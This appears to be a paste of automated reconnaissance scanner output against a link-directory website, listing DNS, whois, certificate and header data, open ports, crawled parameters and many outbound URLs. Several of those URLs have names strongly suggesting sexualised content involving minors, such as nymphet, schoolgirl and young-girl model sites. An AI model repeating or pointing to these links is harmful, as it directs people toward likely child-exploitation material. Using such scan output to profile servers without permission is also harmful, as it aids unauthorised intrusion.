· 6 years ago · Oct 06, 2019, 05:12 AM
1######################################################################################################################################
2=======================================================================================================================================
3Hostname www.ygmt.info ISP Host Sailor Ltd.
4Continent Europe Flag
5NL
6Country Netherlands Country Code NL
7Region North Holland Local time 06 Oct 2019 05:17 CEST
8City Amsterdam Postal Code 1091
9IP Address 185.82.200.52 Latitude 52.35
10 Longitude 4.917
11======================================================================================================================================
12#######################################################################################################################################
13> www.ygmt.info
14Server: 185.93.180.131
15Address: 185.93.180.131#53
16
17Non-authoritative answer:
18Name: www.ygmt.info
19Address: 185.82.200.52
20>
21#######################################################################################################################################
22[+] Target : www.ygmt.info
23
24[+] IP Address : 185.82.200.52
25
26[+] Headers :
27
28[+] Date : Sun, 06 Oct 2019 03:23:56 GMT
29[+] Server : Apache/2.4.10 (Debian)
30[+] Last-Modified : Wed, 13 Mar 2019 00:18:15 GMT
31[+] ETag : "a0d-583eebde65fc0-gzip"
32[+] Accept-Ranges : bytes
33[+] Vary : Accept-Encoding
34[+] Content-Encoding : gzip
35[+] Content-Length : 1379
36[+] Keep-Alive : timeout=5, max=100
37[+] Connection : Keep-Alive
38[+] Content-Type : text/html
39
40[+] SSL Certificate Information :
41
42[+] organizationalUnitName : PositiveSSL
43[+] commonName : ygmt.info
44[+] countryName : GB
45[+] stateOrProvinceName : Greater Manchester
46[+] localityName : Salford
47[+] organizationName : COMODO CA Limited
48[+] commonName : COMODO RSA Domain Validation Secure Server CA
49[+] Version : 3
50[+] Serial Number : FD0AC3A33FCAF37C66E222C7581E08CC
51[+] Not Before : Feb 14 00:00:00 2017 GMT
52[+] Not After : Feb 14 23:59:59 2018 GMT
53[+] OCSP : ('http://ocsp.comodoca.com',)
54[+] subject Alt Name : (('DNS', 'ygmt.info'), ('DNS', 'www.ygmt.info'))
55[+] CA Issuers : ('http://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt',)
56[+] CRL Distribution Points : ('http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl',)
57
58[+] Whois Lookup :
59
60[+] NIR : None
61[+] ASN Registry : ripencc
62[+] ASN : 60117
63[+] ASN CIDR : 185.82.200.0/24
64[+] ASN Country Code : NL
65[+] ASN Date : 2014-12-31
66[+] ASN Description : HS, AE
67[+] cidr : 185.82.200.0/24
68[+] name : EU-HOSTSAILOR-20150101
69[+] handle : AF11712-RIPE
70[+] range : 185.82.200.0 - 185.82.200.255
71[+] description : HostSailor NL Services
72[+] country : NL
73[+] state : None
74[+] city : None
75[+] address : Suite No: 1605, Churchill Executive Tower, Burj Khalifa Area
76Dubai P.O. Box 98362
77United Arab Emirates
78[+] postal_code : None
79[+] emails : None
80[+] created : 2015-01-01T11:31:29Z
81[+] updated : 2015-01-01T11:31:29Z
82
83[+] Crawling Target...
84
85[+] Looking for robots.txt........[ Not Found ]
86[+] Looking for sitemap.xml.......[ Not Found ]
87[+] Extracting CSS Links..........[ 0 ]
88[+] Extracting Javascript Links...[ 0 ]
89[+] Extracting Internal Links.....[ 0 ]
90[+] Extracting External Links.....[ 0 ]
91[+] Extracting Images.............[ 0 ]
92
93[+] Total Links Extracted : 0
94
95[+] Completed!
96#######################################################################################################################################
97[+] Starting At 2019-10-05 23:24:26.164428
98[+] Collecting Information On: http://www.ygmt.info/top50/index.php?method=in
99[#] Status: 200
100--------------------------------------------------
101[#] Web Server Detected: Apache/2.4.10 (Debian)
102[!] X-Frame-Options Headers not detect! target might be vulnerable Click Jacking
103- Date: Sun, 06 Oct 2019 03:24:23 GMT
104- Server: Apache/2.4.10 (Debian)
105- Vary: Accept-Encoding
106- Content-Encoding: gzip
107- Content-Length: 9486
108- Keep-Alive: timeout=5, max=100
109- Connection: Keep-Alive
110- Content-Type: text/html; charset=UTF-8
111--------------------------------------------------
112[#] Finding Location..!
113[#] as: AS60117 Host Sailor Ltd.
114[#] city: Amsterdam
115[#] country: Netherlands
116[#] countryCode: NL
117[#] isp: EU-HOSTSAILOR
118[#] lat: 52.35
119[#] lon: 4.9167
120[#] org: HostSailor NL Services
121[#] query: 185.82.200.52
122[#] region: NH
123[#] regionName: North Holland
124[#] status: success
125[#] timezone: Europe/Amsterdam
126[#] zip: 1091
127--------------------------------------------------
128[x] Didn't Detect WAF Presence on: http://www.ygmt.info/top50/index.php?method=in
129--------------------------------------------------
130[#] Starting Reverse DNS
131[-] Failed ! Fail
132--------------------------------------------------
133[!] Scanning Open Port
134[#] 22/tcp open ssh
135[#] 80/tcp open http
136[#] 443/tcp open https
137[#] 10000/tcp open snet-sensor-mgmt
138--------------------------------------------------
139[+] Collecting Information Disclosure!
140[#] Detecting sitemap.xml file
141[-] sitemap.xml file not Found!
142[#] Detecting robots.txt file
143[-] robots.txt file not Found!?
144[#] Detecting GNU Mailman
145[-] GNU Mailman App Not Detected!?
146--------------------------------------------------
147[+] Crawling Url Parameter On: http://www.ygmt.info/top50/index.php?method=in
148--------------------------------------------------
149[#] Searching Html Form !
150[+] Html Form Discovered
151[#] action: index.php
152[#] class: None
153[#] id: None
154[#] method: get
155--------------------------------------------------
156[-] No DOM Paramter Found!?
157--------------------------------------------------
158[!] 113 Internal Dynamic Parameter Discovered
159[+] http://www.ygmt.info/top50/index.php?method=in/android-app://
160[+] http://www.ygmt.info/top50/index.php?method=in//favicon.ico
161[+] http://www.ygmt.info/top50/index.php?method=in/css/tooltipster-follower.min.css
162[+] http://www.ygmt.info/top50/index.php?method=in/css/tooltipster.bundle.min.css
163[+] http://www.ygmt.info/top50/index.php?a=join
164[+] http://www.ygmt.info/top50/index.php?a=user_cpl
165[+] http://www.ygmt.info/top50/index.php?a=stats
166[+] http://www.ygmt.info/top50/index.php?method=in/index.php?method=in&cat=Free+Sites&start=1
167[+] http://www.ygmt.info/top50/index.php?method=in/index.php?method=in&cat=Pay+Sites&start=1
168[+] http://www.ygmt.info/top50/index.php?method=in/index.php?method=in&cat=Nonude+Sites&start=1
169[+] http://www.ygmt.info/top50/index.php?method=in/index.php?method=in&cat=Security&start=1
170[+] http://www.ygmt.info/top50/index.php?method=in/index.php?method=in&cat=Top+Lists&start=1
171[+] http://www.ygmt.info/top50/index.php?method=in/index.php?method=in&cat=Book+Stores&start=1
172[+] http://www.ygmt.info/top50/index.php?cat=Free+Sites
173[+] http://www.ygmt.info/top50/index.php?a=stats&u=61
174[+] http://www.ygmt.info/top50/index.php?cat=Free+Sites
175[+] http://www.ygmt.info/top50/index.php?a=stats&u=80
176[+] http://www.ygmt.info/top50/index.php?cat=Free+Sites
177[+] http://www.ygmt.info/top50/index.php?a=stats&u=43
178[+] http://www.ygmt.info/top50/index.php?cat=Top+Lists
179[+] http://www.ygmt.info/top50/index.php?a=stats&u=63
180[+] http://www.ygmt.info/top50/index.php?cat=Top+Lists
181[+] http://www.ygmt.info/top50/index.php?a=stats&u=19
182[+] http://www.ygmt.info/top50/index.php?cat=Free+Sites
183[+] http://www.ygmt.info/top50/index.php?a=stats&u=75
184[+] http://www.ygmt.info/top50/index.php?cat=Free+Sites
185[+] http://www.ygmt.info/top50/index.php?a=stats&u=47
186[+] http://www.ygmt.info/top50/index.php?cat=Free+Sites
187[+] http://www.ygmt.info/top50/index.php?a=stats&u=7
188[+] http://www.ygmt.info/top50/index.php?cat=Free+Sites
189[+] http://www.ygmt.info/top50/index.php?a=stats&u=6
190[+] http://www.ygmt.info/top50/index.php?cat=Free+Sites
191[+] http://www.ygmt.info/top50/index.php?a=stats&u=33
192[+] http://www.ygmt.info/top50/index.php?cat=Free+Sites
193[+] http://www.ygmt.info/top50/index.php?a=stats&u=74
194[+] http://www.ygmt.info/top50/index.php?cat=Free+Sites
195[+] http://www.ygmt.info/top50/index.php?a=stats&u=2
196[+] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
197[+] http://www.ygmt.info/top50/index.php?a=stats&u=39
198[+] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
199[+] http://www.ygmt.info/top50/index.php?a=stats&u=100
200[+] http://www.ygmt.info/top50/index.php?cat=Free+Sites
201[+] http://www.ygmt.info/top50/index.php?a=stats&u=16
202[+] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
203[+] http://www.ygmt.info/top50/index.php?a=stats&u=98
204[+] http://www.ygmt.info/top50/index.php?cat=Free+Sites
205[+] http://www.ygmt.info/top50/index.php?a=stats&u=11
206[+] http://www.ygmt.info/top50/index.php?cat=Free+Sites
207[+] http://www.ygmt.info/top50/index.php?a=stats&u=15
208[+] http://www.ygmt.info/top50/index.php?cat=Nonude+Sites
209[+] http://www.ygmt.info/top50/index.php?a=stats&u=64
210[+] http://www.ygmt.info/top50/index.php?cat=Free+Sites
211[+] http://www.ygmt.info/top50/index.php?a=stats&u=25
212[+] http://www.ygmt.info/top50/index.php?cat=Book+Stores
213[+] http://www.ygmt.info/top50/index.php?a=stats&u=22
214[+] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
215[+] http://www.ygmt.info/top50/index.php?a=stats&u=83
216[+] http://www.ygmt.info/top50/index.php?cat=Free+Sites
217[+] http://www.ygmt.info/top50/index.php?a=stats&u=23
218[+] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
219[+] http://www.ygmt.info/top50/index.php?a=stats&u=76
220[+] http://www.ygmt.info/top50/index.php?cat=Book+Stores
221[+] http://www.ygmt.info/top50/index.php?a=stats&u=62
222[+] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
223[+] http://www.ygmt.info/top50/index.php?a=stats&u=34
224[+] http://www.ygmt.info/top50/index.php?cat=Free+Sites
225[+] http://www.ygmt.info/top50/index.php?a=stats&u=21
226[+] http://www.ygmt.info/top50/index.php?cat=Top+Lists
227[+] http://www.ygmt.info/top50/index.php?a=stats&u=31
228[+] http://www.ygmt.info/top50/index.php?cat=Book+Stores
229[+] http://www.ygmt.info/top50/index.php?a=stats&u=95
230[+] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
231[+] http://www.ygmt.info/top50/index.php?a=stats&u=45
232[+] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
233[+] http://www.ygmt.info/top50/index.php?a=stats&u=87
234[+] http://www.ygmt.info/top50/index.php?cat=Free+Sites
235[+] http://www.ygmt.info/top50/index.php?a=stats&u=30
236[+] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
237[+] http://www.ygmt.info/top50/index.php?a=stats&u=18
238[+] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
239[+] http://www.ygmt.info/top50/index.php?a=stats&u=40
240[+] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
241[+] http://www.ygmt.info/top50/index.php?a=stats&u=71
242[+] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
243[+] http://www.ygmt.info/top50/index.php?a=stats&u=49
244[+] http://www.ygmt.info/top50/index.php?cat=Free+Sites
245[+] http://www.ygmt.info/top50/index.php?a=stats&u=9
246[+] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
247[+] http://www.ygmt.info/top50/index.php?a=stats&u=1
248[+] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
249[+] http://www.ygmt.info/top50/index.php?a=stats&u=46
250[+] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
251[+] http://www.ygmt.info/top50/index.php?a=stats&u=14
252[+] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
253[+] http://www.ygmt.info/top50/index.php?a=stats&u=66
254[+] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
255[+] http://www.ygmt.info/top50/index.php?a=stats&u=28
256[+] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
257[+] http://www.ygmt.info/top50/index.php?a=stats&u=68
258[+] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
259[+] http://www.ygmt.info/top50/index.php?a=stats&u=81
260[+] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
261[+] http://www.ygmt.info/top50/index.php?a=stats&u=20
262[+] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
263[+] http://www.ygmt.info/top50/index.php?a=stats&u=58
264[+] http://www.ygmt.info/top50/index.php?cat=Book+Stores
265[+] http://www.ygmt.info/top50/index.php?a=stats&u=60
266[+] http://www.ygmt.info/top50/index.php?cat=Free+Sites
267[+] http://www.ygmt.info/top50/index.php?a=stats&u=93
268[+] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
269[+] http://www.ygmt.info/top50/index.php?a=stats&u=52
270[+] http://www.ygmt.info/top50/index.php?cat=Security
271[+] http://www.ygmt.info/top50/index.php?a=stats&u=56
272--------------------------------------------------
273[!] 23 External Dynamic Parameter Discovered
274[#] http://alt.binaries.pictures.bcseries.org/top.php?t=toprating
275[#] http://alt.binaries.pictures.bcseries.org/top.php?t=toprating
276[#] http://alt.binaries.pictures.y-a-b.info/groups.php?group=alt.binaries.pictures.sandra
277[#] http://alt.binaries.pictures.y-a-b.info/groups.php?group=alt.binaries.pictures.sandra
278[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=919377-0000&PA=996348
279[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=919377-0000&PA=996348
280[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=940234-0000&PA=2330083&HTML=http://zora.girly-shoot.com
281[#] http://www.newnudecash.com/hit.php?s=1&p=2&w=106991&t=1&c=
282[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0002&PA=1984667&HTML=http://girlsdelta.com/main/
283[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=927141-0000&PA=999829
284[#] http://www.affiliate-cash.de/kunden.php?nummer=780877247&progid=24307
285[#] http://www.newnudecash.com/hit.php?s=3&p=2&w=106991&t=0&c=
286[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=935262&PA=2147380&HTML=http://www.averotica.com/
287[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0000&PA=1984667&BAN=2&HTML=http://girlsdelta.com/main/
288[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=932281-0000&PA=2347265&HTML=http://www.richardmurrian.net/
289[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=925728-0004&PA=2189756&HTML=http://www.schoolgirls-asia.com/new/schoolgirlsasia.htm
290[#] http://my.sweet-angels.net/top.php?t=toprating
291[#] https://www.usenetarchive.net/top.php?t=toprating
292[#] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=900004-0000&PA=996312
293[#] http://U.webring.com/wrman?ring=younggirlsmodelp&addsite
294[#] http://www.nymphs.us/?;id=4&random
295[#] http://www.nymphs.us/?;id=4&prev
296[#] http://www.nymphs.us/?;id=4&next
297--------------------------------------------------
298[!] 5 Internal links Discovered
299[+] https://www.ygmt.info/
300[+] http://www.ygmt.info/top50/skins/photo50/screen.css
301[+] http://www.ygmt.info/top50/feed.php
302[+] http://www.ygmt.info/top50/
303[+] http://www.ygmt.info/top50/
304--------------------------------------------------
305[!] 69 External links Discovered
306[#] http://www.ccleaner.com
307[#] http://www.ccleaner.com
308[#] http://tiny.ma.cx
309[#] http://tiny.ma.cx
310[#] http://www.eternal-nymphets.net/
311[#] http://www.eternal-nymphets.net/
312[#] http://www.dreamsphoto.com
313[#] http://www.dreamsphoto.com
314[#] http://www.jav-teen.club
315[#] http://www.jav-teen.club
316[#] http://www.javpetite.top/reviews/index.html
317[#] http://www.javpetite.top/reviews/index.html
318[#] http://www.y-a-b.net/
319[#] http://www.my-usenet.com/
320[#] http://www.sweet-angels.net/
321[#] http://www.usenetarchive.net
322[#] http://www.usenetarchive.net
323[#] http://www.mclt.net
324[#] http://www.mclt.net
325[#] http://www.teeny-models.com
326[#] http://www.teeny-models.com
327[#] http://www.eternal-nymphets.net
328[#] http://www.eternal-nymphets.net
329[#] http://kansai.ma.cx/
330[#] http://kansai.ma.cx/
331[#] http://gurugallerie.com
332[#] http://gurugallerie.com
333[#] http://tokyodoll.ma.cx/
334[#] http://tokyodoll.ma.cx/
335[#] http://www.sweet-angels.net
336[#] http://www.sweet-angels.net
337[#] http://latinpetite.ma.cx
338[#] http://latinpetite.ma.cx
339[#] http://www0.ma.cx
340[#] http://www0.ma.cx
341[#] http://tokyodoll.ma.cx
342[#] http://tokyodoll.ma.cx
343[#] http://www0.ma.cx
344[#] http://www0.ma.cx
345[#] http://www.dreamsphoto.com/
346[#] http://www.dreamsphoto.com/
347[#] http://www.javusenet.com
348[#] http://www.javusenet.com
349[#] http://www.tinymodel-amber.info/
350[#] http://www.tinymodel-amber.info/
351[#] http://www.beautygirl-story.com/
352[#] http://www.beautygirl-story.com/
353[#] http://www.body-n-mind.com/naturista.htm
354[#] http://www.body-n-mind.com/naturista.htm
355[#] http://www.y-a-b.net/
356[#] http://www.my-usenet.com/
357[#] http://www.sweet-angels.net/
358[#] http://gurugallerie.com
359[#] http://groups.yahoo.com/group/my-usenetcom/join
360[#] http://kansai.ma.cx/
361[#] http://www.tinymodel-princess.info
362[#] http://www.eternal-nymphets.net/
363[#] http://www.newstar-krystal.info/
364[#] http://www.cdoll.top
365[#] http://members.mclt.net/
366[#] http://click.dtiserv2.com/Click2/2347001-347-us5905
367[#] http://www.newstar-diana.info/
368[#] http://www.garoaida.co.jp/
369[#] http://www.javusenet.com/
370[#] http://www.y-a-b.net/
371[#] http://www.sweet-angels.net/
372[#] https://veracrypt.codeplex.com/
373[#] http://www.nymphs.us
374[#] http://www.aardvarktopsitesphp.com/
375--------------------------------------------------
376[#] Mapping Subdomain..
377[!] Found 2 Subdomain
378- ygmt.info
379- www.ygmt.info
380--------------------------------------------------
381[!] Done At 2019-10-05 23:24:39.075700
382#######################################################################################################################################
383[INFO] ------TARGET info------
384[*] TARGET: http://www.ygmt.info/top50/index.php?method=in
385[*] TARGET IP: 185.82.200.52
386[INFO] NO load balancer detected for www.ygmt.info...
387[*] DNS servers: freedns1.registrar-servers.com.
388[*] TARGET server: Apache/2.4.10 (Debian)
389[*] CC: NL
390[*] Country: Netherlands
391[*] RegionCode: NH
392[*] RegionName: North Holland
393[*] City: Amsterdam
394[*] ASN: AS60117
395[*] BGP_PREFIX: 185.82.200.0/24
396[*] ISP: HS Host Sailor Ltd., AE
397[INFO] DNS enumeration:
398[INFO] Possible abuse mails are:
399[*] abuse@hostsailor.com
400[*] abuse@www.ygmt.info
401[*] abuse@ygmt.info
402[INFO] NO PAC (Proxy Auto Configuration) file FOUND
403[INFO] Checking for HTTP status codes recursively from /top50/index.php?method=in
404[INFO] Status code Folders
405[*] 200 http://www.ygmt.info/top50/
406[INFO] Starting FUZZing in http://www.ygmt.info/FUzZzZzZzZz...
407[INFO] Status code Folders
408[ALERT] Look in the source code. It may contain passwords
409[INFO] Links found from http://www.ygmt.info/top50/index.php?method=in http://185.82.200.52/:
410[*] http://185.82.200.52/www.met-art.com/2000/annette/index.htm
411[*] http://185.82.200.52/www.met-art.com/2000/gal_alejul/
412[*] http://185.82.200.52/www.met-art.com/2000/gal_anna/index887.htm
413[*] http://185.82.200.52/www.met-art.com/2000/gal_anna/index.htm
414[*] http://185.82.200.52/www.met-art.com/2000/gal_av_andrea_inna/index.htm
415[*] http://185.82.200.52/www.met-art.com/2000/gal_wings/index.htm
416[*] http://185.82.200.52/www.met-art.com/2000/juliamm/index.htm
417[*] http://185.82.200.52/www.met-art.com/2000/nocturna/index.htm
418[*] http://185.82.200.52/www.met-art.com/c32/120403.htm
419[*] http://185.82.200.52/www.met-art.com/c32/120503.htm
420[*] http://185.82.200.52/www.met-art.com/c32/120603_2.htm
421[*] http://185.82.200.52/www.met-art.com/c32/120603.htm
422[*] http://185.82.200.52/www.met-art.com/c32/120703_2.htm
423[*] http://185.82.200.52/www.met-art.com/c32/120703.htm
424[*] http://185.82.200.52/www.met-art.com/gallery031803/index87.htm
425[*] http://185.82.200.52/www.met-art.com/gallery031803/index.htm
426[*] http://185.82.200.52/www.met-art.com/ngal04/indexrrits.htm
427[*] http://185.82.200.52/www.met-art.com/ngal04/indexrrits.htm.htm
428[*] http://a.b.pictures.teeny-angels.net/freearchive.php
429[*] http://alt.binaries.pictures.bcseries.org/
430[*] http://alt.binaries.pictures.bcseries.org/top.php?t=toprating
431[*] http://alt.binaries.pictures.y-a-b.info/groups.php?group=alt.binaries.pictures.sandra
432[*] http://click.dtiserv2.com/Click2/2347001-347-us5905
433[*] http://groups.yahoo.com/group/my-usenetcom/join
434[*] http://gurugallerie.com/
435[*] http://hosted.met-art.com/generated_gallery/hosted/10141/10141.htm?CA=901313-0000&pa=996317
436[*] http://hosted.met-art.com/generated_gallery/hosted/10142/10142.htm?CA=901313-0000&pa=996317
437[*] http://hosted.met-art.com/generated_gallery/hosted/10143/10143.htm?CA=901313-0000&pa=996317
438[*] http://hosted.met-art.com/generated_gallery/hosted/10144/10144.htm?CA=901313-0000&pa=996317
439[*] http://hosted.met-art.com/generated_gallery/hosted/10145/10145.htm?CA=901313-0000&pa=996317
440[*] http://hosted.met-art.com/generated_gallery/hosted/10146/10146.htm?CA=901313-0000&pa=996317
441[*] http://hosted.met-art.com/generated_gallery/hosted/10146/434fdf4re.html?CA=901313-0000&pa=996317
442[*] http://hosted.met-art.com/generated_gallery/hosted/10146/5434eresre.html?CA=901313-0000&pa=996317
443[*] http://hosted.met-art.com/generated_gallery/hosted/10146/5434fdf4re.html?CA=901313-0000&pa=996317
444[*] http://hosted.met-art.com/generated_gallery/hosted/8209/8209.html?CA=901313-0000&pa=996317
445[*] http://hosted.met-art.com/generated_gallery/hosted/8210/8210.html?CA=901313-0000&pa=996317
446[*] http://hosted.met-art.com/generated_gallery/hosted/8211/8211.html?CA=901313-0000&pa=996317
447[*] http://hosted.met-art.com/generated_gallery/hosted/8212/8212.html?CA=901313-0000&pa=996317
448[*] http://hosted.met-art.com/generated_gallery/hosted/crystal/index.htm?CA=901313-0000&pa=996317
449[*] http://hosted.met-art.com/generated_gallery/hosted/gocce/index.htm?CA=901313-0000&pa=996317
450[*] http://hosted.met-art.com/generated_gallery/hosted/Itaca/index.htm?CA=901313-0000&pa=996317
451[*] http://hosted.met-art.com/generated_gallery/hosted/Liza/index.htm?CA=901313-0000&pa=996317
452[*] http://hosted.met-art.com/generated_gallery/hosted/mixed/index.htm?CA=901313-0000&pa=996317
453[*] http://hosted.met-art.com/generated_gallery/hosted/sasha/index.htm?CA=901313-0000&pa=996317
454[*] http://hosted.met-art.com/hosted/1245.htm?CA=901313-0000&pa=996317
455[*] http://hosted.met-art.com/hosted/4we4334.htm?CA=901313-0000&pa=996317
456[*] http://hosted.met-art.com/hosted/a45456.htm?CA=901313-0000&pa=996317
457[*] http://hosted.met-art.com/hosted/df43rdwe.htm?CA=901313-0000&pa=996317
458[*] http://hosted.met-art.com/hosted/fcdf43r42.htm?CA=901313-0000&pa=996317
459[*] http://hosted.met-art.com/hosted/fds43532.htm?CA=901313-0000&pa=996317
460[*] http://hosted.met-art.com/hosted/ff34e4543.htm?CA=901313-0000&pa=996317
461[*] http://hosted.met-art.com/hosted/kuyrter.htm?CA=901313-0000&pa=996317
462[*] http://hosted.met-art.com/hosted/z344532.htm?CA=901313-0000&pa=996317
463[*] http://kansai.ma.cx/
464[*] http://latinpetite.ma.cx/
465[*] http://members.mclt.net/
466[*] http://my.sweet-angels.net/top.php?t=toprating
467[*] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=900004-0000&PA=996312
468[*] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=919377-0000&PA=996348
469[*] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=925728-0004&PA=2189756&HTML=http://www.schoolgirls-asia.com/new/schoolgirlsasia.htm
470[*] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=927141-0000&PA=999829
471[*] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=932281-0000&PA=2347265&HTML=http://www.richardmurrian.net/
472[*] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0000&PA=1984667&BAN=2&HTML=http://girlsdelta.com/main/
473[*] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0002&PA=1984667&HTML=http://girlsdelta.com/main/
474[*] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=935262&PA=2147380&HTML=http://www.averotica.com/
475[*] http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=940234-0000&PA=2330083&HTML=http://zora.girly-shoot.com
476[*] https://alt.binaries.pictures.bcseries.org/
477[*] https://veracrypt.codeplex.com/
478[*] https://www.usenetarchive.net/top.php?t=toprating
479[*] http://tiny.ma.cx/
480[*] http://tokyodoll.ma.cx/
481[*] http://U.webring.com/wrman?ring=younggirlsmodelp&addsite
482[*] http://www0.ma.cx/
483[*] http://www.aardvarktopsitesphp.com/
484[*] http://www.affiliate-cash.de/kunden.php?nummer=780877247&progid=24307
485[*] http://www.beautygirl-story.com/
486[*] http://www.body-n-mind.com/naturista.htm
487[*] http://www.cdoll.top/
488[*] http://www.dreamsphoto.com/
489[*] http://www.eternal-nymphets.net/
490[*] http://www.garoaida.co.jp/
491[*] http://www.imageport.info/
492[*] http://www.imageport.info/portal01.html
493[*] http://www.javpetite.top/reviews/index.html
494[*] http://www.jav-teen.club/
495[*] http://www.javusenet.com/
496[*] http://www.mclt.net/
497[*] http://www.met-art.nymphs.net.tf/
498[*] http://www.my-usenet.com/
499[*] http://www.newnudecash.com/hit.php?s=1&p=2&w=106991&t=1&c=
500[*] http://www.newnudecash.com/hit.php?s=3&p=2&w=106991&t=0&c=
501[*] http://www.newstar-diana.info/
502[*] http://www.newstar-krystal.info/
503[*] http://www.nozomis.com/
504[*] http://www.nymphs.us/
505[*] http://www.nymphs.us/?;id=4&next
506[*] http://www.nymphs.us/?;id=4&prev
507[*] http://www.nymphs.us/?;id=4&random
508[*] http://www.photo50.com/
509[*] http://www.sweet-angels.asia/
510[*] http://www.sweet-angels.net/
511[*] http://www.teen-beauty.com/01105/223rr9.html?CA=901313-0000&pa=996317
512[*] http://www.teen-beauty.com/01105/232432dds.html?CA=901313-0000&pa=996317
513[*] http://www.teen-beauty.com/01105/324232d9.html?CA=901313-0000&pa=996317
514[*] http://www.teen-beauty.com/01105/3423232d9.html?CA=901313-0000&pa=996317
515[*] http://www.teen-beauty.com/01105/43945342.html?CA=901313-0000&pa=996317
516[*] http://www.teen-beauty.com/01105/4432d9.html?CA=901313-0000&pa=996317
517[*] http://www.teen-beauty.com/01105/asaere4.html?CA=901313-0000&pa=996317
518[*] http://www.teen-beauty.com/01105/dopfdorter.html?CA=901313-0000&pa=996317
519[*] http://www.teen-beauty.com/01105/ff43434fsd.html?CA=901313-0000&pa=996317
520[*] http://www.teen-beauty.com/01105/zjukui87.html?CA=901313-0000&pa=996317
521[*] http://www.teeny-models.com/
522[*] http://www.tinymodel-amber.info/
523[*] http://www.tinymodel-princess.info/
524[*] http://www.usenetarchive.net/
525[*] http://www.y-a-b.net/
526[*] http://www.ygmt.info/top50/
527[*] http://www.ygmt.info/top50/feed.php
528[*] http://www.ygmt.info/top50/index.php?a=join
529[*] http://www.ygmt.info/top50/index.php?a=stats
530[*] http://www.ygmt.info/top50/index.php?a=stats&u=1
531[*] http://www.ygmt.info/top50/index.php?a=stats&u=100
532[*] http://www.ygmt.info/top50/index.php?a=stats&u=11
533[*] http://www.ygmt.info/top50/index.php?a=stats&u=14
534[*] http://www.ygmt.info/top50/index.php?a=stats&u=15
535[*] http://www.ygmt.info/top50/index.php?a=stats&u=16
536[*] http://www.ygmt.info/top50/index.php?a=stats&u=18
537[*] http://www.ygmt.info/top50/index.php?a=stats&u=19
538[*] http://www.ygmt.info/top50/index.php?a=stats&u=2
539[*] http://www.ygmt.info/top50/index.php?a=stats&u=20
540[*] http://www.ygmt.info/top50/index.php?a=stats&u=21
541[*] http://www.ygmt.info/top50/index.php?a=stats&u=22
542[*] http://www.ygmt.info/top50/index.php?a=stats&u=23
543[*] http://www.ygmt.info/top50/index.php?a=stats&u=25
544[*] http://www.ygmt.info/top50/index.php?a=stats&u=28
545[*] http://www.ygmt.info/top50/index.php?a=stats&u=30
546[*] http://www.ygmt.info/top50/index.php?a=stats&u=31
547[*] http://www.ygmt.info/top50/index.php?a=stats&u=33
548[*] http://www.ygmt.info/top50/index.php?a=stats&u=34
549[*] http://www.ygmt.info/top50/index.php?a=stats&u=39
550[*] http://www.ygmt.info/top50/index.php?a=stats&u=40
551[*] http://www.ygmt.info/top50/index.php?a=stats&u=43
552[*] http://www.ygmt.info/top50/index.php?a=stats&u=45
553[*] http://www.ygmt.info/top50/index.php?a=stats&u=46
554[*] http://www.ygmt.info/top50/index.php?a=stats&u=47
555[*] http://www.ygmt.info/top50/index.php?a=stats&u=49
556[*] http://www.ygmt.info/top50/index.php?a=stats&u=52
557[*] http://www.ygmt.info/top50/index.php?a=stats&u=56
558[*] http://www.ygmt.info/top50/index.php?a=stats&u=58
559[*] http://www.ygmt.info/top50/index.php?a=stats&u=6
560[*] http://www.ygmt.info/top50/index.php?a=stats&u=60
561[*] http://www.ygmt.info/top50/index.php?a=stats&u=61
562[*] http://www.ygmt.info/top50/index.php?a=stats&u=62
563[*] http://www.ygmt.info/top50/index.php?a=stats&u=63
564[*] http://www.ygmt.info/top50/index.php?a=stats&u=64
565[*] http://www.ygmt.info/top50/index.php?a=stats&u=66
566[*] http://www.ygmt.info/top50/index.php?a=stats&u=68
567[*] http://www.ygmt.info/top50/index.php?a=stats&u=7
568[*] http://www.ygmt.info/top50/index.php?a=stats&u=71
569[*] http://www.ygmt.info/top50/index.php?a=stats&u=74
570[*] http://www.ygmt.info/top50/index.php?a=stats&u=75
571[*] http://www.ygmt.info/top50/index.php?a=stats&u=76
572[*] http://www.ygmt.info/top50/index.php?a=stats&u=80
573[*] http://www.ygmt.info/top50/index.php?a=stats&u=81
